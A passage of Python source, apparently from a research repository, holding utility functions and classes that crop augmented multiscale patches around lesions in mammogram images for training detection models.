filtered_input_list = [input_dict[key] for key in keys]
return filtered_input_list
def load_json(json_path):
with open(json_path, 'r') as f_in:
data_dict = json.load(f_in)
return data_dict
def write_json(data_dict, json_path):
with open(json_path, "w", encoding='utf-8') as f:
json.dump(data_dict, f, indent=4, sort_keys=True)<file_sep>"""This file includes utility functions and classes for multiscale patch crop"""
import tensorflow as tf
import cv2
import re
import shutil
import json
import glob2
import logging
import matplotlib.pyplot as plt
import numpy as np
import os
import random
from skimage import measure
from tqdm import tqdm
from projects.drutils import fileio
from projects.drutils import augmentation
plt.rcParams['image.cmap'] = 'gray'
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def generate_maskinfo(np_mask):
"""Return the mask corner and center coordinates
Args:
np_mask(numpy.array): the mask image, should be binary {0, 1}
Returns:
corners(list of float): [xmin(axis=0), ymin, xmax, ymax]
centers(list of float): [centerx, centery]
"""
# NB. The order of numpy is always in (y, x) or (row, col)
y, x = np.where(np_mask == np.max(np_mask))
xmin, xmax = min(x), max(x)
ymin, ymax = min(y), max(y)
corners = [xmin, ymin, xmax, ymax]
centers = [int((xmin + xmax) / 2), int((ymin + ymax) / 2)]
return corners, centers
def get_lesion_size_ratio(corners, patch_shape):
"""Compute bbox to patch size ratio
Args:
corner_resize: tightest bbox coord of lesion (xmin, ymin, xmax, ymax)
patch_shape: in the order of (y_size, x_size)
Returns:
lesion_size_ratio: sqrt(lesion_area / patch_area)
"""
xmin, ymin, xmax, ymax = corners
h, w = patch_shape
lesion_size_ratio = ((xmax - xmin) * (ymax - ymin) / (h * w)) ** 0.5
return lesion_size_ratio
def generate_rotate_list(rotations_per_axis=6, max_degree=30):
"""generate a list of degrees randomly
Args:
rotations_per_axis(integer): the number of degrees
max_degree(float): the max degree will rotate
Returns:
degrees(list of float): from -max_degree to +max_degree
"""
# oversample by 20 times and select #rotation_per_axis numbers
degrees = []
if rotations_per_axis >= 1:
degrees.extend(np.random.choice(
np.arange(-max_degree, max_degree, max_degree / (20 * rotations_per_axis)), size=rotations_per_axis))
return degrees
def generate_negative_sample(image_path, label_path, patch_size, neg_imagedir, isrotate=False,
ignore_padding=0,
n_patches=20,
key='',
nonezero_threshold=0.5,
scale=1.0,
resize_jitter_list=[0.75, 1.25],
max_trial_per_patch=5):
"""
Generate the negative sample, random choose 100 points, to see if the result meet the demand
Args:
image_path(str)
label_path(str): if empty, then use an all zero mask
patch_size(int)
neg_imagedir(str)
Returns:
None
"""
assert image_path
image = cv2.imread(image_path, -1)
if label_path:
label = cv2.imread(label_path, -1)
else:
print('Use all zero mask!')
label = np.zeros_like(image, dtype=np.uint8)
target_size = np.array([patch_size * 3, patch_size * 2])
max_trial = n_patches * max_trial_per_patch # for each patch try up to max_trial_per_patch times
i = 0
trial = 0
max_nonzero_ratio = 0
while trial <= max_trial and i < n_patches:
trial += 1
resize_ratio_lower, resize_ratio_upper = resize_jitter_list
resize_jitter = np.random.uniform(resize_ratio_lower, resize_ratio_upper)
image_resize = augmentation.resize(image, scale=resize_jitter*scale)
label_resize = augmentation.resize(label, scale=resize_jitter*scale)
image_resize_shape = np.asarray(image_resize.shape)
if np.any(image_resize_shape < target_size):
target_size = np.maximum(target_size, image_resize_shape)
image_pad = augmentation.center_pad(image_resize, target_size)
label_pad = augmentation.center_pad(label_resize, target_size)
# Generate rotation angle randomly
if isrotate:
degree = generate_rotate_list(rotations_per_axis=1, max_degree=180)
M = cv2.getRotationMatrix2D((image_pad.shape[0]/2, image_pad.shape[1]/2), degree[0], 1) # the rotation center must be tuple
image_rotate = cv2.warpAffine(image_pad, M, (image_pad.shape[1], image_pad.shape[0]))
label_rotate = cv2.warpAffine(label_pad, M, image_pad.shape)
image_aug = image_rotate
label_aug = label_rotate
else:
image_aug = image_pad
label_aug = label_pad
y = random.randint(patch_size / 2, image_aug.shape[0] - patch_size / 2)
x = random.randint(patch_size / 2, image_aug.shape[1] - patch_size / 2)
label_patch = label_aug[int(y - patch_size / 2): int(y + patch_size / 2),
int(x - patch_size / 2): int(x + patch_size / 2)]
image_patch = image_aug[int(y - patch_size / 2): int(y + patch_size / 2),
int(x - patch_size / 2): int(x + patch_size / 2)]
central_label_patch = label_patch[ignore_padding:-ignore_padding, ignore_padding:-ignore_padding]
central_image_patch = image_patch[ignore_padding:-ignore_padding, ignore_padding:-ignore_padding]
nonzero_ratio = np.count_nonzero(central_image_patch) / central_image_patch.size
if not central_label_patch.any():
max_nonzero_ratio = max(max_nonzero_ratio, nonzero_ratio)
if nonzero_ratio >= nonezero_threshold:
print('============', nonzero_ratio)
i += 1
neg_patch = image_patch
neg_path = os.path.join(neg_imagedir, key, "{}_neg{:03d}_scale{:.2f}.png".format(key, i, scale))
neg_label_path = os.path.join(neg_imagedir, key, "{}_neg{:03d}_scale{:.2f}_mask.png".format(key, i, scale))
fileio.maybe_make_new_dir(os.path.dirname(neg_path))
fileio.maybe_make_new_dir(os.path.dirname(neg_label_path))
if neg_patch.shape == (patch_size, patch_size) and label_patch.shape == (patch_size, patch_size):
cv2.imwrite(neg_path, neg_patch)
cv2.imwrite(neg_label_path, label_patch)
else:
continue
print('max_nonzero_ratio', max_nonzero_ratio)
def stratefied_sampling_neg_and_pos(positive_patch_search_path,
negative_patch_search_path,
strata_regex_pattern,
positive_dir,
negative_dir,
output_dir,
max_ratio=2,
seed=42):
"""Sample from positive and negative
Args:
positive_patch_search_path:
negative_patch_search_path:
strata_regex_pattern:
positive_dir:
negative_dir:
output_path:
max_ratio:
seed: random seed for shuffling
Returns:
None
"""
positive_files = glob2.glob(positive_patch_search_path)
positive_files = [file for file in positive_files if re.search(strata_regex_pattern, file)]
negative_files = glob2.glob(negative_patch_search_path)
negative_files = [file for file in negative_files if re.search(strata_regex_pattern, file)]
n_pos = len(positive_files)
n_neg = len(negative_files)
# if too many negatives, truncate at max_ratio
if n_neg > n_pos * max_ratio:
print('Truncate from {} to {} files'.format(n_neg, n_pos * max_ratio))
negative_files = sorted(negative_files)
np.random.seed(seed)
np.random.shuffle(negative_files)
negative_files = negative_files[:(n_pos * max_ratio)]
# copy files
for source_file in tqdm(positive_files):
new_file = source_file.replace(positive_dir, output_dir)
# print('{} --> {}'.format(source_file, new_file))
fileio.maybe_make_new_dir(os.path.dirname(new_file))
shutil.copyfile(source_file, new_file)
# copy images
shutil.copyfile(source_file.replace('_mask', ''), new_file.replace('_mask', ''))
for source_file in tqdm(negative_files):
new_file = source_file.replace(negative_dir, output_dir)
# print('{} --> {}'.format(source_file, new_file))
fileio.maybe_make_new_dir(os.path.dirname(new_file))
shutil.copyfile(source_file, new_file)
# copy images
shutil.copyfile(source_file.replace('_mask', ''), new_file.replace('_mask', ''))
def affine_crop(image_array, crop_center, patch_shape, rotate_angle=0, mode='constant'):
"""Core function for rotation and crop patch
Args:
image_array(np.array): The original image
crop_center(tuple): The center coordinate to crop (x,y)
patch_shape(tuple): The final patch size, tuples of int (width, height)
rotate_angle(float or int): rotation angle in degree unit
mode: np.pad mode, can be `constant` or `reflect`
Returns:
np array, cropped patch array
"""
if mode == 'reflect':
x_center, y_center = crop_center
w_patch, h_patch = patch_shape
h_image, w_image = np.array(image_array.shape)
xpad1 = -min(0, x_center - w_patch//2)
xpad2 = max(0, x_center + (w_patch + 1)//2 - w_image)
ypad1 = -min(0, y_center - h_patch//2)
ypad2 = max(0, y_center + (h_patch + 1)//2 - h_image)
image_array = np.pad(image_array, ((ypad1, ypad2), (xpad1, xpad2)), mode=mode)
crop_center = np.array(crop_center) + np.array((ypad1, xpad1))
radian = rotate_angle * np.pi / 180
rot_mat = np.asarray([[np.cos(radian), -np.sin(radian)],
[np.sin(radian), np.cos(radian)]])
# if dst_center is not int, it will run into unfaithful cropping when patch_size is odd number
dst_center = (np.asarray(patch_shape).reshape(-1, 1) / 2).astype(np.int)
trans_mat = dst_center - np.matmul(rot_mat, np.asarray(crop_center).reshape(2,1))
dst_point = np.asarray([[0,0], [patch_shape[0], 0], [patch_shape[0], patch_shape[1]], [0, patch_shape[1]]]).T
src_point = np.matmul(np.linalg.inv(rot_mat), (dst_point - trans_mat)).T
M = cv2.getPerspectiveTransform(src_point.astype(np.float32), dst_point.T.astype(np.float32))
patch_array = cv2.warpPerspective(image_array, M, patch_shape)
return patch_array
def translate(crop_center, translation):
"""Translate the cropping center
Args:
crop_center: np array or list (x, y)
translation: np array with the same shape as crop_center (x and y can be different)
Return:
np array: translated crop_center
"""
crop_center = np.asarray(crop_center) + translation
return crop_center
def get_crop_center_and_size_from_bbox(bbox):
"""Return crop center and size from bbox quadruple
Note that the center and size are in the order of (x, y)
Args:
bbox:
Returns:
"""
ymin, xmin, ymax, xmax = bbox
crop_center = [int((xmin + xmax) / 2), int((ymin + ymax) / 2)]
crop_size = [xmax - xmin, ymax - ymin]
return crop_center, crop_size
class BaseROICropper2D(object):
"""Base class for cropping ROIs from a single image
Args:
image_path:
output_dir:
patch_size:
mask_path:
"""
def __init__(self, image_path, output_dir, patch_size=512, mask_path=None):
self.image_path = image_path
self.output_dir = output_dir
self.mask_path = mask_path
self.patch_size = patch_size
self.name = os.path.basename(image_path).split(".")[0].split("_")[0]
def load_image_arrays(self):
image_array = cv2.imread(self.image_path, -1)
if self.mask_path is not None:
mask_array = cv2.imread(self.mask_path, -1)
else:
mask_array = None
return image_array, mask_array
@staticmethod
def crop_once(image_array, crop_center, patch_shape, scale=1.0, aug_param_dict={}):
"""Crop image_array based on center, patch_shape and augmentation parameters
Args:
image_array:
crop_center:
patch_shape: shape of cropped patches in the orignal iamge. If None, infer
from scale by (patch_size / scale, patch_size / scale)
scale: the smaller the scale is, the larger the original patch is
aug_param_dict:
Returns:
np array, cropped image array
"""
# If aug_param_dict is empty, default to no augmentation
rotate_angle = aug_param_dict.get('rotate_angle', 0)
translation = aug_param_dict.get('translation', 0)
is_flip = aug_param_dict.get('is_flip', False)
resize_jitter = aug_param_dict.get('resize_jitter', 1)
scale *= resize_jitter
translation = np.asarray(translation / scale).astype(np.int)
crop_center = translate(crop_center, translation)
patch_shape = tuple(patch_shape) # this is required by cv2.warpPerspective
patch_image_array = affine_crop(image_array, crop_center, patch_shape, rotate_angle)
if is_flip:
patch_image_array = np.fliplr(patch_image_array)
return patch_image_array
class DetectedROICropper2D(BaseROICropper2D):
"""Crop ROIs from a single image according to a list of detection bboxes and corresponding scales
Args:
image_path:
output_dir:
bbox_dict_path_list: a list of path to bbox_dict json files. The bbox_dict has (name, info_dict) pair, and
info_dict has at least the following fields:
pred_bbox_list:
pred_box_correct:
gt_bbox_list:
gt_box_covered:
scale_list:
patch_size:
mask_path:
crop_by_bbox: if True, use detection bbox as cropping criterion, otherwise use the scale of activation
bbox_dilation: ratio to dilate bbox for cropping
crop_mode: could be one of the following
'square': crop a square with the side of max(patch_shape) centered at the bbox center
'bbox': crop according to the bbox (the final patch may not be square)
"""
def __init__(self, image_path, output_dir, bbox_dict_path_list, scale_list,
patch_size=512, mask_path=None, suffix='.png',
crop_by_bbox_size=False, do_resize=True,
bbox_dilation_ratio=1.0, bbox_dilation_size=0,
crop_mode='square'):
super(DetectedROICropper2D, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.bbox_dict_path_list = bbox_dict_path_list
self.scale_list = scale_list
self.suffix = suffix
self.crop_by_bbox_size = crop_by_bbox_size
self.bbox_dilation_ratio = bbox_dilation_ratio
self.bbox_dilation_size = bbox_dilation_size
self.crop_mode = crop_mode
self.do_resize = do_resize
assert self.crop_mode in ['square', 'bbox']
def load_bboxes(self, bbox_dict_path):
# load bbox_list for an image from bbox_dict_path
with open(bbox_dict_path, 'r') as f_in:
bbox_dict = json.load(f_in)
if self.name in bbox_dict:
bbox_list = bbox_dict[self.name]['pred_bbox_list']
bbox_iscorrect_list = bbox_dict[self.name]['pred_box_correct']
else:
bbox_list = []
bbox_iscorrect_list = []
return bbox_list, bbox_iscorrect_list
def write_arrays(self, image_sample, output_dir, name, scale, bbox_idx, iscorrect=False, label_sample=None, suffix='.png'):
tp_or_fp_string = 'TP' if iscorrect else 'FP'
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{}_scale{:.2f}{}".format(name, bbox_idx, tp_or_fp_string, scale, suffix))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
out_labelpath = os.path.join(
output_dir, name, "{}_{:03d}_{}_scale{:.2f}{}".format(name, bbox_idx, tp_or_fp_string, scale, suffix))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_bbox_list(self, image_array, bbox_list, bbox_iscorrect_list, scale):
for bbox_idx, (bbox, iscorrect) in enumerate(zip(bbox_list, bbox_iscorrect_list)):
crop_center, crop_size = get_crop_center_and_size_from_bbox(bbox)
if self.crop_by_bbox_size:
logging.debug('raw crop_size {}'.format(crop_size))
crop_size = np.array(crop_size) * self.bbox_dilation_ratio + 2 * self.bbox_dilation_size
logging.debug('adjusted crop_size {}'.format(crop_size))
if self.crop_mode == 'square':
patch_shape = np.array([max(crop_size), max(crop_size)]).astype(int)
elif self.crop_mode == 'bbox':
patch_shape = crop_size.astype(int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape, scale=scale)
if self.do_resize:
patch_image_array = augmentation.resize(patch_image_array,
dst_shape=(self.patch_size, self.patch_size))
else:
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape, scale=scale)
assert patch_image_array.shape == (self.patch_size, self.patch_size)
self.write_arrays(image_sample=patch_image_array, label_sample=None,
output_dir=self.output_dir,
name=self.name, scale=scale,
bbox_idx=bbox_idx, iscorrect=iscorrect, suffix=self.suffix)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
for bbox_dict_path, scale in zip(self.bbox_dict_path_list, self.scale_list):
bbox_list, bbox_iscorrect_list = self.load_bboxes(bbox_dict_path)
self.crop_by_bbox_list(image_array, bbox_list, bbox_iscorrect_list, scale)
class AugmentedROICropper2D(BaseROICropper2D):
"""Crop augmented ROIs from a single image (and corresponding mask)
Total images = nb_scales * 1 *(1+nb_rotations)*nb_labels
Args:
image_path: str, the path to image
mask_path: str, the path to mask
output_dir: str, the output directory for both images and labels
patch_size: int, size of final patch (square)
max_degree: float: the maximum degree of rotation
max_translation: int, the maximum value of translation
upscales: list of float, if the mass is too small, resize the image with upscales
downscales: list of float, if the mass is too big, resize the image with downscales
size_list: list of two float, lower and upper bound of the ratio of mass_size / patch_size
resize_jitter_list: list of two float, lower and upper bound of randomly resizing factor
do_flip: bool, if true, perform random horizontal flip
"""
def __init__(self, image_path, mask_path, output_dir,
patch_size=512, n_patches=1,
max_degree=0, max_translation=0,
upscales=(2.,), downscales=(0.5, 0.25, 0.125),
size_range=(0.25, 0.5),
resize_jitter_range=(1., 1.),
do_flip=False):
super(AugmentedROICropper2D, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.do_flip = do_flip
self.max_degree = max_degree
self.max_translation = max_translation
self.resize_jitter_range = resize_jitter_range
self.n_patches = n_patches
self.n_lesions = 0
self.upscales = upscales
self.downscales = downscales
self.size_range = size_range
def sample_augmentation_param(self):
"""Sample degree, translation, resize_jitter
From self.max_degree and self.max_translation and self.resize_jitter_range
"""
translation = np.random.randint(-self.max_translation // 2, self.max_translation // 2 + 1, size=2)
degree = random.uniform(-self.max_degree, self.max_degree)
resize_ratio_lower, resize_ratio_upper = self.resize_jitter_range
resize_jitter = random.uniform(resize_ratio_lower, resize_ratio_upper)
is_flip = self.do_flip and (random.uniform(0,1) > 0.5)
aug_param_dict = {}
aug_param_dict['rotate_angle'] = degree
aug_param_dict['translation'] = translation
aug_param_dict['resize_jitter'] = resize_jitter
aug_param_dict['is_flip'] = is_flip
return aug_param_dict
def get_lesion_masks_and_scales(self, mask_array):
"""Determine the scales to crop patches based on the lesion size
Args:
mask_array: the mask array
Return:
tuple of list: a list of lesion masks, a list of scales for each lesion in the mask
"""
size_lower, size_upper = self.size_range
labeled_mask_array = measure.label(mask_array, connectivity=2)
# the number of mass the image contains
self.n_lesions = np.max(labeled_mask_array)
scales = []
lesion_masks = []
for i in range(1, self.n_lesions + 1):
# generate a mask image that only contains one connected component
cur_label = (labeled_mask_array == i).astype(np.uint8) * 255
corner_resize, center_resize = generate_maskinfo(cur_label)
# get lesion size
edge_ratio = get_lesion_size_ratio(corner_resize, (self.patch_size, self.patch_size))
# find scale
total_scales = sorted([1] + self.upscales + self.downscales)
scale = 0
if edge_ratio * min(total_scales) > size_upper:
scale = min(total_scales)
elif edge_ratio * max(total_scales) < size_lower:
scale = max(total_scales)
else:
for scale in total_scales:
if size_lower <= edge_ratio * scale <= size_upper:
break
scales.append(scale)
lesion_masks.append(cur_label)
assert np.all(scales), 'Some scale is zero {}'.format(scales)
return lesion_masks, scales
def get_crop_center_and_size_from_mask(self, labeled_mask_array):
"""Get center and size of lesion from binary mask
Args:
labeled_mask_array: binary array with only one connected component in it
Returns:
crop_center, crop_size
"""
corners, centers = generate_maskinfo(labeled_mask_array)
xmin, ymin, xmax, ymax = corners
crop_size = (xmax - xmin, ymax - ymin)
crop_center = centers
return crop_center, crop_size
def write_arrays(self, image_sample, output_dir, name, lesion_idx, aug_idx, scale, label_sample=None):
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
out_labelpath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}_mask.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_mask(self, image_array, mask_array):
"""Crop lesion patches according to each connected component in mask_array
Args:
image_array:
mask_array:
Returns:
None
"""
lesion_masks, scales = self.get_lesion_masks_and_scales(mask_array)
for lesion_idx, (lesion_mask, scale) in enumerate(zip(lesion_masks, scales)):
crop_center, crop_size = self.get_crop_center_and_size_from_mask(lesion_mask)
for aug_idx in range(self.n_patches):
aug_param_dict = self.sample_augmentation_param()
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
patch_mask_array = self.crop_once(lesion_mask, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
# binarize upscaled mask
patch_mask_array = (patch_mask_array > patch_mask_array.max() * 0.5).astype(np.int8) * 255
self.write_arrays(image_sample=patch_image_array, label_sample=patch_mask_array,
output_dir=self.output_dir,
name=self.name, lesion_idx=lesion_idx, aug_idx=aug_idx, scale=scale)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
self.crop_by_mask(image_array, mask_array)
class AugmentedROICropper2D_v2(BaseROICropper2D):
"""Crop augmented ROIs from a single image (and corresponding calc mask).
Crop center randomly sampled from another image (cluster mask).
First concat image and mask into one multi-channel image, then crop as usual.
Finally split channels into differnt images.
Total images = nb_scales * 1 *(1+nb_rotations)*nb_labels
Args:
image_path: str, the path to image
mask_path: str, the path to mask
output_dir: str, the output directory for both images and labels
patch_size: int, size of final patch (square)
max_degree: float: the maximum degree of rotation
max_translation: int, the maximum value of translation
upscales: list of float, if the mass is too small, resize the image with upscales
downscales: list of float, if the mass is too big, resize the image with downscales
size_list: list of two float, lower and upper bound of the ratio of mass_size / patch_size
resize_jitter_list: list of two float, lower and upper bound of randomly resizing factor
do_flip: bool, if true, perform random horizontal flip
"""
def __init__(self, image_path, mask_path, output_dir,
patch_size=512, n_patches=1,
max_degree=0, max_translation=0,
upscales=(), downscales=(),
size_range=(np.inf, -np.inf),
resize_jitter_range=(1., 1.),
do_flip=False):
super(AugmentedROICropper2D_v2, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.do_flip = do_flip
self.max_degree = max_degree
self.max_translation = max_translation
self.resize_jitter_range = resize_jitter_range
self.n_patches = n_patches
self.n_lesions = -1
self.upscales = upscales
self.downscales = downscales
self.size_range = size_range
def load_image_arrays(self):
image_array = cv2.imread(self.image_path, -1)
assert isinstance(self.mask_path, list) and (len(self.mask_path) == 2)
calc_mask_path, cluster_mask_path = self.mask_path
calc_mask_array = cv2.imread(calc_mask_path, -1)
cluster_mask_array = cv2.imread(cluster_mask_path, -1)
assert (len(calc_mask_array.shape) == 2)
assert (len(cluster_mask_array.shape) == 2)
if image_array.shape != calc_mask_array.shape:
print('{} != {}'.format(image_array.shape, calc_mask_array.shape))
calc_mask_array = augmentation.crop_or_pad(calc_mask_array, image_array.shape)
image_array = np.dstack([image_array, calc_mask_array])
mask_array = cluster_mask_array
return image_array, mask_array
def split_image_array(self, image_sample):
assert (len(image_sample.shape) == 3)
assert (image_sample.shape[-1] == 2)
image_sample, label_sample = image_sample[..., 0], image_sample[..., 1]
return image_sample, label_sample
def sample_augmentation_param(self):
"""Sample degree, translation, resize_jitter
From self.max_degree and self.max_translation and self.resize_jitter_range
"""
translation = np.random.randint(-self.max_translation // 2, self.max_translation // 2 + 1, size=2)
degree = random.uniform(-self.max_degree, self.max_degree)
resize_ratio_lower, resize_ratio_upper = self.resize_jitter_range
resize_jitter = random.uniform(resize_ratio_lower, resize_ratio_upper)
is_flip = self.do_flip and (random.uniform(0,1) > 0.5)
aug_param_dict = {}
aug_param_dict['rotate_angle'] = degree
aug_param_dict['translation'] = translation
aug_param_dict['resize_jitter'] = resize_jitter
aug_param_dict['is_flip'] = is_flip
return aug_param_dict
def get_random_crop_center_from_mask(self, mask_array):
"""Get center and size of lesion from binary mask
Args:
mask_array: binary array
Returns:
crop_center
"""
y_list, x_list = np.where(mask_array > 0)
xy_list = list(zip(x_list, y_list))
random_idx = np.random.choice(len(xy_list))
crop_center = xy_list[random_idx]
return crop_center
def write_arrays(self, image_sample, output_dir, name, lesion_idx, aug_idx, scale, label_sample=None):
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
out_labelpath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}_mask.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_mask(self, image_array, mask_array):
"""Crop lesion patches according to each connected component in mask_array
Args:
image_array:
mask_array:
Returns:
None
"""
crop_center = self.get_random_crop_center_from_mask(mask_array)
for aug_idx in range(self.n_patches):
aug_param_dict = self.sample_augmentation_param()
scale = 1.0
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
patch_image_array, patch_mask_array = self.split_image_array(patch_image_array)
# binarize upscaled mask
patch_mask_array = (patch_mask_array > patch_mask_array.max() * 0.5).astype(np.int8) * 255
self.write_arrays(image_sample=patch_image_array, label_sample=patch_mask_array,
output_dir=self.output_dir,
name=self.name, lesion_idx=0, aug_idx=aug_idx, scale=scale)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
self.crop_by_mask(image_array, mask_array)
if __name__ == "__main__":
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('task', 'pos_crop', 'task name, can be pos_crop or neg_crop')
# logging.getLogger().setLevel(logging.DEBUG)
def get_dict_from_search_path(image_search_path, label_search_path):
image_pngs = glob2.glob(image_search_path)
label_pngs = glob2.glob(label_search_path)
key_fn = lambda x: os.path.basename(x).split('.')[0].split("_")[0]
image_dict = {key_fn(path): path for path in image_pngs}
label_dict = {key_fn(path): path for path in label_pngs}
return image_dict, label_dict
if FLAGS.task == 'crop_by_bbox':
output_dir = '/data/log/mammo/detection_patches_bbox2/'
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
mask_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png"
# NB. Run batch evaluate to generate bbox_dict json first
scale = 1.0
if scale == 1.0:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale1.0.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-280000-ziwei-scale1.0/*png'
elif scale == 0.5:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale0.5.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-70000-ziwei-scale0.5/*png'
elif scale == 0.25:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale0.25.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-90000-ziwei-scale0.25/*png'
# find intersection of two sets of keys
image_dict, label_dict = get_dict_from_search_path(pred_search_path, mask_search_path)
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
# generate cropped images, predictions and masks
for image_search_path, suffix in zip([image_search_path, pred_search_path, mask_search_path],
['_img.png', '_pred.png', '_mask.png']):
image_dict, label_dict = get_dict_from_search_path(image_search_path, mask_search_path)
for key in tqdm(keys[:]):
# for key in ['11740735-4']:
label_path = label_dict[key]
image_path = image_dict[key]
DetectedROICropper2D(image_path, output_dir,
patch_size=512,
mask_path=None,
bbox_dict_path_list=[bbox_dict_path],
scale_list=[scale],
suffix=suffix,
crop_by_bbox_size=True,
bbox_dilation_ratio=4.0, # 4 times the bbox size
bbox_dilation_size=-400,
crop_mode='square').deploy()
elif FLAGS.task == 'crop_by_mask':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_test"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_3456/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:5]):
# for key in ['11737954-1']:
mask_path = label_dict[key]
image_path = image_dict[key]
# label_path = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask/11740735-4_combined.png'
# image_path = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/11740735-4.dcm.png'
output_dir = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/test/'
AugmentedROICropper2D(image_path, mask_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[2], downscales=[1 / 2.0, 1 / 4.0, 1 / 8.0],
size_range=[1 / 4, 1 / 2],
resize_jitter_range=[0.75, 1.25],
do_flip=True).deploy()
elif FLAGS.task == 'pos_crop_ziwei':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_3456/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
label_path = label_dict[key]
image_path = image_dict[key]
info_dict = augment_roi_2D(image_path, label_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[1.0], downscales=[1/2.0, 1/4.0, 1/8.0, 1/16.0],
size_list=[100/512, 200/512],
resize_jitter_list=[0.75, 1.25],
do_flip=True,
padding="constant",
key=key)
all_info_dict.append(info_dict.items())
elif FLAGS.task == 'neg_crop':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg"
elif FLAGS.task == 'neg_crop_ziwei':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg"
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# crop from negative images as well
keys = sorted(list(set(image_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
print(key)
label_path = label_dict.get(key, '')
image_path = image_dict.get(key, '')
generate_negative_sample(image_path, label_path, isrotate=True,key=key,
neg_imagedir=neg_imagedir,
patch_size=512,
ignore_padding=128, # generally keep it as patch_size / 4
n_patches=10,
scale=1.0,
nonezero_threshold=0.75,
resize_jitter_list=[0.75, 1.25])
if FLAGS.task == 'pos_crop_inbreast':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_inbreast_pos_small"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
